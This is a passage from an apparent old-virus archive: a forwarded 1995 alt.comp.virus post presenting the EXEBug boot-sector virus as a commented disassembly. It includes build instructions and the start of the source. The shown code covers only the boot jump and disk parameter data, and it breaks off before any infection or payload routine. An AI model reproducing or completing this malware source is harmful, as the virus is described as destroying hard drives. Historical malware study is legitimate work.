exebug.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

From smtp Tue Feb  7 13:18 EST 1995
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue,  7 Feb 95 13:18 EST
Received: by lynx.dac.neu.edu (8.6.9/8.6.9) 
     id NAA25457 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:20:39 -0500
Date: Tue, 7 Feb 1995 13:20:39 -0500
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
Content-Length: 44201
Content-Type: binary
Message-Id: <199502071820.NAA25457@lynx.dac.neu.edu>
To: pobox.jwu.edu!joshuaw 
Subject: (fwd) EXEBug
Newsgroups: alt.comp.virus
Status: O

Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
From: danishm@iia.org ()
Newsgroups: alt.comp.virus
Subject: EXEBug
Date: 5 Feb 1995 22:08:52 GMT
Organization: International Internet Association.
Lines: 641
Message-ID: <3h3i9k$v4@ankh.iia.org>
NNTP-Posting-Host: iia.org
X-Newsreader: TIN [version 1.2 PL2]

Here is the EXEBug virus:

;-------------------------------------------------------------------------
.286p                                   ; The EXEBUG2 Virus.  This virus
.model tiny                             ; infects diskette boot sectors and
.code                                   ; activates in March of any year,
                                        ; destroying the hard drive.  It
        ORG     0100h                   ; contains instructions for 80286+
                                        ; processors.
;---------------------------------------;---------------------------------
; As of Apr 21st, this disassembly is   ; Disassembled with Master Core
; incomplete, as the test computer uses ;  Disassembler: IQ Software
; Disk Manager and can not be infected. ; Analyzed with Quaid Analyzer:
;                                       ;  Quaid Software Ltd.
;-------------------------------------------------------------------------
; We are using an origin of 100h, so that this can be assembled with TASM
; and linked with tlink /t.  You will have a 512 byte .COM file which is
; a byte-for-byte duplicate of the original boot sector. Note that 100h
; must be subtracted from many of the offsets.
;-------------------------------------------------------------------------
                                        ;Offset Opcode  |Comment
                                        ;---------------------------------
Boot_Start:                             ;00100  EB1C
                                        ;---------------------------------
        JMP     Short Change_RAM        ; Boot sectors always begin with
                                        ; a long jump (E9 XX XX) or a short
                                        ; jump (EB XX 90)
                                        ;---------------------------------
        NOP                             ;00102  90      |NOP for short jump
;---------------------------------------;               |
; Data in Code Area                     ;               |
;---------------------------------------;               |
OEM     DB      "MSDOS5.0"              ;00103  4D53444F|OEM name
Byt_Sec DW      0200h                   ;0010B  0002    |Bytes per sector
Sct_AlU DB      02h                     ;0010D  02      |Sectors per
                                        ;               | allocation unit
RsvdSct DW      0001h                   ;0010E  0100    |Reserved sectors
NumFATs DB      02h                     ;00110  02      |Number of FATs
RootSiz DW      0070h                   ;00111  7000    |Number of root dir
                                        ;               | entries (112)
TotSect DW      02D0h                   ;00113  D002    |Total sectors in
                                        ;               | volume (1440)
MedDesc DB      0FDh                    ;00115  FD      |Media descriptor
                                        ;               | byte:
                                        ;---------------------------------
                                        ;  F8 = hard disk
                                        ;  F0 = 3